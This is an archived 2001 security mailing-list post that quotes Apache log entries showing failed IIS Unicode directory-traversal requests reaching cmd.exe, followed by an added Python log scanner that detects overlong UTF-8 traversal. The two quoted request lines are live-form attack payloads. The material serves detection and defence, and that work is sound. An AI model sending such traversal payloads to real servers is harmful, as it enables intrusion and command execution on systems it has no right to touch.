hi all,

i found these in my apache logs after a quick check:

209.250.131.60 - - [10/Jun/2001:17:50:29 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 231
209.250.131.60 - - [10/Jun/2001:17:50:30 -0400] "GET /msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 246

in a nutshell, plain old unicode directory traversal attempts. (failed, obviously.) normally i would have dismissed these as 'kids', but these reports on a new IIS worm have me wondering if anyone has a signature for the scans it does:

http://www.symantec.com/avcenter/venc/data/dos.storm.worm.html
http://www.security-informer.com/ic_620113_3494_1-3283.html

thanks.

____________________________
jose nazario joseat_private
PGP: 89 B0 81 DA 5B FD 7E 00 99 C3 B2 CD 48 A0 07 80
PGP key ID 0xFD37F4E5 (pgp.mit.edu)
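An added example, not part of the original post and not a signature for the worm mentioned in it: a log check that flags requests like the two quoted above by decoding overlong 2- and 3-byte UTF-8 encodings of ASCII characters and then looking for a ../ or ..\ sequence. The function names and the two 192.0.2.10 log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Apache common log format: host ident user [time] "METHOD target PROTO" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*" (\d{3}) \S+')

SAMPLE = [
    # the two requests quoted in the post
    '209.250.131.60 - - [10/Jun/2001:17:50:29 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 231',
    '209.250.131.60 - - [10/Jun/2001:17:50:30 -0400] "GET /msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 246',
    # constructed benign lines: a plain request and a valid (shortest-form) UTF-8 path
    '192.0.2.10 - - [10/Jun/2001:17:51:02 -0400] "GET /index.html HTTP/1.0" 200 1043',
    '192.0.2.10 - - [10/Jun/2001:17:51:05 -0400] "GET /caf%c3%a9/menu.html HTTP/1.0" 200 512',
]

def lenient_decode(raw: bytes):
    """Decode the way a non-strict UTF-8 decoder would, counting overlong
    2- and 3-byte encodings of ASCII characters (invalid per RFC 3629)."""
    out, overlong, i = bytearray(), 0, 0
    while i < len(raw):
        b, nxt = raw[i], raw[i + 1:i + 3]
        if b in (0xC0, 0xC1) and nxt and nxt[0] & 0xC0 == 0x80:
            out.append(((b & 0x1F) << 6) | (nxt[0] & 0x3F))
            overlong, i = overlong + 1, i + 2
        elif (b == 0xE0 and len(nxt) == 2 and nxt[0] in (0x80, 0x81)
              and nxt[1] & 0xC0 == 0x80):
            out.append(((nxt[0] & 0x3F) << 6) | (nxt[1] & 0x3F))
            overlong, i = overlong + 1, i + 3
        else:
            out.append(b)
            i += 1
    return out.decode("latin-1"), overlong

def scan(lines):
    """Return one finding per request that carries overlong-encoded
    characters and contains ../ or ..\\ once they are decoded."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        host, when, target, status = m.groups()
        decoded, overlong = lenient_decode(unquote_to_bytes(target))
        if overlong and re.search(r'\.\.[/\\]', decoded):
            findings.append({"host": host, "time": when, "status": status,
                             "overlong": overlong, "decoded": decoded})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f)
```

The status field is kept in each finding so that 404 responses, as in the post, can be separated from any 200s that need follow-up.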
This archive was generated by hypermail 2b30 : Wed Jun 13 2001 - 13:24:12 PDT